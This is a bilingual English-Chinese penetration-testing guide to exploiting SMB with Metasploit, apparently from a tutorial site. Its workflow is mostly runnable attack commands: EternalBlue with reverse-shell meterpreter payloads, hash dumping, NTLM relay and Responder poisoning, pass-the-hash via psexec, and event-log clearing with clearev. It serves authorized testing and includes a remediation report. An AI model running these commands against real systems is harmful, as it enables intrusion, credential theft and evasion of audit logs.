Back to Details

exploiting-smb-vulnerabilities-with-metasploit

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Exploiting SMB Vulnerabilities with Metasploit

利用Metasploit挖掘SMB漏洞

When to Use

适用场景

  • Testing Windows systems for critical SMB vulnerabilities (EternalBlue, EternalRomance, PrintNightmare) during authorized penetration tests
  • Demonstrating lateral movement risks via SMB relay, pass-the-hash, and credential spraying
  • Validating that patch management processes have addressed known SMB vulnerabilities
  • Assessing SMB signing enforcement and share permission configurations across the domain
  • Testing network segmentation by attempting SMB exploitation across VLAN boundaries
Do not use against systems without explicit written authorization, against production domain controllers without a maintenance window, or to deploy persistent backdoors beyond the scope of the assessment.
  • 在授权渗透测试中,针对Windows系统检测关键SMB漏洞(EternalBlue、EternalRomance、PrintNightmare)
  • 演示通过SMB中继、哈希传递、凭证喷射实现横向移动的风险
  • 验证补丁管理流程是否已修复已知SMB漏洞
  • 评估域内SMB签名强制策略和共享权限配置情况
  • 通过跨VLAN尝试SMB漏洞利用,测试网络分段有效性
禁止使用场景:未获得明确书面授权的系统、未在维护窗口期内的生产域控制器,或在评估范围外部署持久化后门。

Prerequisites

前置条件

  • Metasploit Framework 6.x installed (
    msfconsole --version
    )
  • Authorized penetration test scope document listing target IP ranges and approved attack types
  • Network access to target SMB services (TCP 445, TCP 139)
  • CrackMapExec and Impacket tools installed for complementary SMB testing
  • Valid test credentials or credential wordlists approved for the engagement
  • Kali Linux or equivalent testing platform
  • 已安装Metasploit Framework 6.x(执行
    msfconsole --version
    确认)
  • 包含目标IP范围和批准攻击类型的授权渗透测试范围文档
  • 可访问目标SMB服务的网络权限(TCP 445、TCP 139端口)
  • 已安装CrackMapExec和Impacket工具用于补充SMB测试
  • 经测试授权的有效凭证或凭证字典
  • Kali Linux或同类测试平台

Workflow

操作流程

Step 1: Enumerate SMB Services and Versions

步骤1:枚举SMB服务及版本

bash
undefined
bash
undefined

Discover hosts with SMB open using Nmap

使用Nmap发现开放SMB的主机

nmap -sS -p 445,139 --open -oA smb_hosts 10.10.0.0/24
nmap -sS -p 445,139 --open -oA smb_hosts 10.10.0.0/24

Enumerate SMB versions and OS information

枚举SMB版本和操作系统信息

nmap -sV -p 445 --script smb-os-discovery,smb-protocols -oA smb_enum 10.10.0.0/24
nmap -sV -p 445 --script smb-os-discovery,smb-protocols -oA smb_enum 10.10.0.0/24

Use CrackMapExec for rapid SMB enumeration

使用CrackMapExec快速枚举SMB

crackmapexec smb 10.10.0.0/24 --gen-relay-list smb_nosigning.txt
crackmapexec smb 10.10.0.0/24 --gen-relay-list smb_nosigning.txt

Check SMB signing status (disabled = vulnerable to relay)

检查SMB签名状态(禁用状态易受中继攻击)

crackmapexec smb 10.10.0.0/24 --smb-signing
crackmapexec smb 10.10.0.0/24 --smb-signing

Enumerate shares with null session

通过空会话枚举共享

crackmapexec smb 10.10.0.0/24 -u '' -p '' --shares
undefined
crackmapexec smb 10.10.0.0/24 -u '' -p '' --shares
undefined

Step 2: Scan for Known SMB Vulnerabilities

步骤2:扫描已知SMB漏洞

bash
undefined
bash
undefined

Start Metasploit and scan for MS17-010 (EternalBlue)

启动Metasploit并扫描MS17-010(EternalBlue)

msfconsole -q msf6> use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(smb_ms17_010)> set RHOSTS file:smb_hosts.txt msf6 auxiliary(smb_ms17_010)> set THREADS 10 msf6 auxiliary(smb_ms17_010)> run
msfconsole -q msf6> use auxiliary/scanner/smb/smb_ms17_010 msf6 auxiliary(smb_ms17_010)> set RHOSTS file:smb_hosts.txt msf6 auxiliary(smb_ms17_010)> set THREADS 10 msf6 auxiliary(smb_ms17_010)> run

Scan for MS08-067 (Conficker vulnerability)

扫描MS08-067(Conficker漏洞)

msf6> use auxiliary/scanner/smb/ms08_067_check msf6 auxiliary(ms08_067_check)> set RHOSTS file:smb_hosts.txt msf6 auxiliary(ms08_067_check)> run
msf6> use auxiliary/scanner/smb/ms08_067_check msf6 auxiliary(ms08_067_check)> set RHOSTS file:smb_hosts.txt msf6 auxiliary(ms08_067_check)> run

Check for SMBGhost (CVE-2020-0796)

检查SMBGhost(CVE-2020-0796)

nmap -p 445 --script smb-vuln-cve-2020-0796 10.10.0.0/24
nmap -p 445 --script smb-vuln-cve-2020-0796 10.10.0.0/24

Check for PrintNightmare (CVE-2021-34527)

检查PrintNightmare(CVE-2021-34527)

crackmapexec smb 10.10.0.0/24 -u testuser -p 'TestPass123' -M printnightmare
undefined
crackmapexec smb 10.10.0.0/24 -u testuser -p 'TestPass123' -M printnightmare
undefined

Step 3: Exploit EternalBlue (MS17-010)

步骤3:利用EternalBlue(MS17-010)

bash
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue)> set RHOSTS 10.10.5.23
msf6 exploit(ms17_010_eternalblue)> set LHOST 10.10.1.99
msf6 exploit(ms17_010_eternalblue)> set LPORT 4444
msf6 exploit(ms17_010_eternalblue)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue)> set MaxExploitAttempts 3
msf6 exploit(ms17_010_eternalblue)> exploit
bash
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue)> set RHOSTS 10.10.5.23
msf6 exploit(ms17_010_eternalblue)> set LHOST 10.10.1.99
msf6 exploit(ms17_010_eternalblue)> set LPORT 4444
msf6 exploit(ms17_010_eternalblue)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue)> set MaxExploitAttempts 3
msf6 exploit(ms17_010_eternalblue)> exploit

Post-exploitation -- verify access level

后渗透阶段 -- 验证访问权限

meterpreter> getuid
meterpreter> getuid

Server username: NT AUTHORITY\SYSTEM

Server username: NT AUTHORITY\SYSTEM

meterpreter> sysinfo meterpreter> ipconfig meterpreter> hashdump
undefined
meterpreter> sysinfo meterpreter> ipconfig meterpreter> hashdump
undefined

Step 4: Perform SMB Relay Attack

步骤4:实施SMB中继攻击

bash
undefined
bash
undefined

Identify hosts without SMB signing (from Step 1)

识别未启用SMB签名的主机(来自步骤1)

Set up NTLM relay with Impacket

使用Impacket设置NTLM中继

sudo impacket-ntlmrelayx -tf smb_nosigning.txt -smb2support -i
sudo impacket-ntlmrelayx -tf smb_nosigning.txt -smb2support -i

Trigger authentication from a compromised host or via phishing

从已攻陷主机或通过钓鱼触发认证

From Meterpreter session on a compromised host:

在已攻陷主机的Meterpreter会话中执行:

meterpreter> shell C:> net use \10.10.1.99\share /user:DOMAIN\admin password
meterpreter> shell C:> net use \10.10.1.99\share /user:DOMAIN\admin password

Or use Metasploit's SMB relay module

或使用Metasploit的SMB中继模块

msf6> use exploit/windows/smb/smb_relay msf6 exploit(smb_relay)> set SMBHOST 10.10.5.30 msf6 exploit(smb_relay)> set LHOST 10.10.1.99 msf6 exploit(smb_relay)> exploit
msf6> use exploit/windows/smb/smb_relay msf6 exploit(smb_relay)> set SMBHOST 10.10.5.30 msf6 exploit(smb_relay)> set LHOST 10.10.1.99 msf6 exploit(smb_relay)> exploit

Use responder to capture NTLM hashes for offline cracking

使用Responder捕获NTLM哈希用于离线破解

sudo responder -I eth0 -wrfv
undefined
sudo responder -I eth0 -wrfv
undefined

Step 5: Pass-the-Hash and Lateral Movement via SMB

步骤5:哈希传递与SMB横向移动

bash
undefined
bash
undefined

Extract hashes from compromised system

从已攻陷系统提取哈希

meterpreter> hashdump
meterpreter> hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::

Use pass-the-hash with CrackMapExec

使用CrackMapExec执行哈希传递

crackmapexec smb 10.10.0.0/24 -u Administrator
-H e19ccf75ee54e06b06a5907af13cef42 --shares
crackmapexec smb 10.10.0.0/24 -u Administrator
-H e19ccf75ee54e06b06a5907af13cef42 --shares

Execute commands via pass-the-hash

通过哈希传递执行命令

crackmapexec smb 10.10.5.30 -u Administrator
-H e19ccf75ee54e06b06a5907af13cef42 -x "whoami && hostname"
crackmapexec smb 10.10.5.30 -u Administrator
-H e19ccf75ee54e06b06a5907af13cef42 -x "whoami && hostname"

Use Impacket psexec for interactive shell

使用Impacket psexec获取交互式shell

impacket-psexec Administrator@10.10.5.30
-hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
impacket-psexec Administrator@10.10.5.30
-hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

Use Metasploit psexec module

使用Metasploit psexec模块

msf6> use exploit/windows/smb/psexec msf6 exploit(psexec)> set RHOSTS 10.10.5.30 msf6 exploit(psexec)> set SMBUser Administrator msf6 exploit(psexec)> set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 msf6 exploit(psexec)> set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(psexec)> set LHOST 10.10.1.99 msf6 exploit(psexec)> exploit
undefined
msf6> use exploit/windows/smb/psexec msf6 exploit(psexec)> set RHOSTS 10.10.5.30 msf6 exploit(psexec)> set SMBUser Administrator msf6 exploit(psexec)> set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 msf6 exploit(psexec)> set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(psexec)> set LHOST 10.10.1.99 msf6 exploit(psexec)> exploit
undefined

Step 6: Document Findings and Clean Up

步骤6:记录发现并清理痕迹

bash
undefined
bash
undefined

Document all compromised systems and access levels

记录所有已攻陷系统和权限级别

In Meterpreter, screenshot desktops for evidence

在Meterpreter中截图桌面作为证据

meterpreter> screenshot
meterpreter> screenshot

List accessible shares and sensitive data

列出可访问的共享和敏感数据

meterpreter> shell C:> net share C:> dir \10.10.5.30\C$\Users\ /s /b
meterpreter> shell C:> net share C:> dir \10.10.5.30\C$\Users\ /s /b

Clean up -- remove any artifacts

清理操作 -- 删除所有遗留痕迹

meterpreter> clearev meterpreter> shell C:> del /f C:\Windows\Temp\payload.exe
meterpreter> clearev meterpreter> shell C:> del /f C:\Windows\Temp\payload.exe

Close all sessions

关闭所有会话

msf6> sessions -K
msf6> sessions -K

Verify cleanup

验证清理结果

crackmapexec smb 10.10.5.23 -u Administrator -H <hash> -x "dir C:\Windows\Temp\payload*"
undefined
crackmapexec smb 10.10.5.23 -u Administrator -H <hash> -x "dir C:\Windows\Temp\payload*"
undefined

Key Concepts

核心概念

TermDefinition
EternalBlue (MS17-010)Critical SMB vulnerability in SMBv1 allowing remote code execution as SYSTEM without authentication, originally developed by the NSA and leaked by Shadow Brokers
SMB SigningCryptographic signing of SMB packets to prevent tampering and relay attacks; when disabled, attackers can relay NTLM authentication to other SMB hosts
Pass-the-HashAuthentication technique using captured NTLM password hashes directly instead of plaintext passwords, bypassing the need to crack the hash
NTLM RelayAttack where captured NTLM authentication is forwarded to a different server in real-time, granting the attacker access as the relayed user
PsExecRemote execution technique that uploads a service binary to the ADMIN$ share and creates a Windows service to execute commands as SYSTEM
Null SessionAnonymous SMB connection (empty username and password) that may expose share listings, user enumeration, and policy information on misconfigured systems
术语定义
EternalBlue (MS17-010)SMBv1中的严重漏洞,无需认证即可远程执行代码获得SYSTEM权限,最初由NSA开发,后被Shadow Brokers泄露
SMB Signing对SMB数据包进行加密签名以防止篡改和中继攻击;禁用时,攻击者可将NTLM认证中继到其他SMB主机
Pass-the-Hash直接使用捕获的NTLM密码哈希进行认证的技术,无需明文密码,也无需破解哈希
NTLM Relay将捕获的NTLM认证实时转发到另一服务器的攻击方式,攻击者可获得被中继用户的访问权限
PsExec远程执行技术,将服务二进制文件上传到ADMIN$共享并创建Windows服务以SYSTEM权限执行命令
Null Session匿名SMB连接(空用户名和密码),在配置错误的系统上可能暴露共享列表、用户枚举和策略信息

Tools & Systems

工具与系统

  • Metasploit Framework: Exploitation framework with dedicated SMB scanner, exploit, and post-exploitation modules for comprehensive SMB testing
  • CrackMapExec: Swiss-army knife for SMB enumeration, credential testing, share enumeration, and command execution across Windows networks
  • Impacket: Python library providing psexec, smbclient, ntlmrelayx, and other tools for low-level SMB protocol interaction
  • Responder: LLMNR/NBT-NS/mDNS poisoner that captures NTLM hashes from Windows name resolution fallback behavior
  • enum4linux-ng: Updated SMB enumeration tool for extracting users, groups, shares, and policies from Windows/Samba hosts
  • Metasploit Framework: 渗透测试框架,包含专用SMB扫描器、漏洞利用和后渗透模块,可完成全面SMB测试
  • CrackMapExec: Windows网络SMB枚举、凭证测试、共享枚举和命令执行的一站式工具
  • Impacket: Python库,提供psexec、smbclient、ntlmrelayx等工具,用于底层SMB协议交互
  • Responder: LLMNR/NBT-NS/mDNS投毒工具,可捕获Windows名称解析回退行为产生的NTLM哈希
  • enum4linux-ng: 升级版SMB枚举工具,可从Windows/Samba主机提取用户、组、共享和策略信息

Common Scenarios

常见场景

Scenario: Internal Penetration Test Targeting Windows Domain via SMB

场景:针对Windows域的内部SMB渗透测试

Context: During an internal penetration test for a financial services firm, the tester has network access to the corporate VLAN (10.10.0.0/16). The scope includes testing all Windows servers and workstations for SMB-related vulnerabilities. Active Directory domain is CORP.EXAMPLE.COM with approximately 200 hosts.
Approach:
  1. Scan the entire /16 for open SMB ports and enumerate OS versions with CrackMapExec
  2. Identify 12 hosts running Windows Server 2012 R2 without MS17-010 patch applied
  3. Exploit EternalBlue on a non-critical file server (10.10.5.23) to gain SYSTEM access
  4. Extract local administrator password hash using hashdump and discover password reuse across 47 hosts
  5. Use pass-the-hash to access a domain controller, extracting the NTDS.dit database
  6. Demonstrate that SMB signing is disabled on 83% of hosts, enabling relay attacks
  7. Document the complete attack chain showing how one unpatched system led to full domain compromise
Pitfalls:
  • EternalBlue exploit can cause a blue screen of death (BSOD) on the target, especially on older or unstable systems
  • Running psexec on heavily monitored endpoints may trigger EDR alerts and burn the engagement
  • Performing hashdump on domain controllers with large databases can cause performance degradation
  • Not checking for SMBv1 explicitly -- some scanners may miss it if SMBv2/v3 is also available
背景: 在某金融服务公司的内部渗透测试中,测试人员可访问企业VLAN(10.10.0.0/16),测试范围包括所有Windows服务器和工作站的SMB相关漏洞。Active Directory域为CORP.EXAMPLE.COM,约有200台主机。
实施步骤:
  1. 使用CrackMapExec扫描整个/16网段,发现开放SMB端口的主机并枚举操作系统版本
  2. 识别出12台未安装MS17-010补丁的Windows Server 2012 R2主机
  3. 利用EternalBlue攻陷一台非关键文件服务器(10.10.5.23),获得SYSTEM权限
  4. 使用hashdump提取本地管理员密码哈希,发现47台主机存在密码复用情况
  5. 通过哈希传递访问域控制器,提取NTDS.dit数据库
  6. 发现83%的主机未启用SMB签名,可实施中继攻击
  7. 记录完整攻击链,展示一台未打补丁的系统如何导致整个域被攻陷
注意事项:
  • EternalBlue漏洞利用可能导致目标系统蓝屏死机(BSOD),尤其是老旧或不稳定的系统
  • 在监控严格的端点上运行psexec可能触发EDR警报,导致测试提前暴露
  • 在大型数据库的域控制器上执行hashdump可能造成性能下降
  • 需明确检查SMBv1状态部分扫描器可能因SMBv2/v3存在而遗漏SMBv1

Output Format

输出格式

undefined
undefined

SMB Vulnerability Assessment Report

SMB漏洞评估报告

Engagement: Internal Penetration Test Target Range: 10.10.0.0/16 (CORP.EXAMPLE.COM) SMB Hosts Discovered: 187
测试项目: 内部渗透测试 目标范围: 10.10.0.0/16 (CORP.EXAMPLE.COM) 已发现SMB主机: 187台

Critical Findings

关键发现

Finding 1: MS17-010 (EternalBlue) - 12 Unpatched Hosts
  • Severity: Critical (CVSS 9.8)
  • Affected: 10.10.5.23, 10.10.5.24, 10.10.8.10 (+ 9 others)
  • Impact: Remote code execution as SYSTEM without authentication
  • Exploited: Yes - gained SYSTEM on 10.10.5.23
  • Remediation: Apply MS17-010 patch, disable SMBv1
Finding 2: SMB Signing Disabled - 155/187 Hosts
  • Severity: High (CVSS 7.5)
  • Impact: NTLM relay attacks allow credential forwarding
  • Exploited: Yes - relayed domain admin credentials
  • Remediation: Enable SMB signing via Group Policy
Finding 3: Local Admin Password Reuse - 47 Hosts
  • Severity: High (CVSS 7.2)
  • Impact: Compromise of one host enables lateral movement to 47 systems
  • Remediation: Deploy LAPS (Local Administrator Password Solution)
undefined
发现1: MS17-010(EternalBlue)- 12台未打补丁主机
  • 严重程度: 高危(CVSS 9.8)
  • 受影响主机: 10.10.5.23、10.10.5.24、10.10.8.10(及其他9台)
  • 影响: 无需认证即可远程执行代码获得SYSTEM权限
  • 已利用: 是 - 攻陷10.10.5.23并获得SYSTEM权限
  • 修复建议: 安装MS17-010补丁,禁用SMBv1
发现2: SMB签名禁用 - 155/187台主机
  • 严重程度: 高(CVSS 7.5)
  • 影响: NTLM中继攻击可实现凭证转发
  • 已利用: 是 - 中继域管理员凭证
  • 修复建议: 通过组策略启用SMB签名
发现3: 本地管理员密码复用 - 47台主机
  • 严重程度: 高(CVSS 7.2)
  • 影响: 攻陷一台主机即可横向移动到47台系统
  • 修复建议: 部署LAPS(本地管理员密码解决方案)
undefined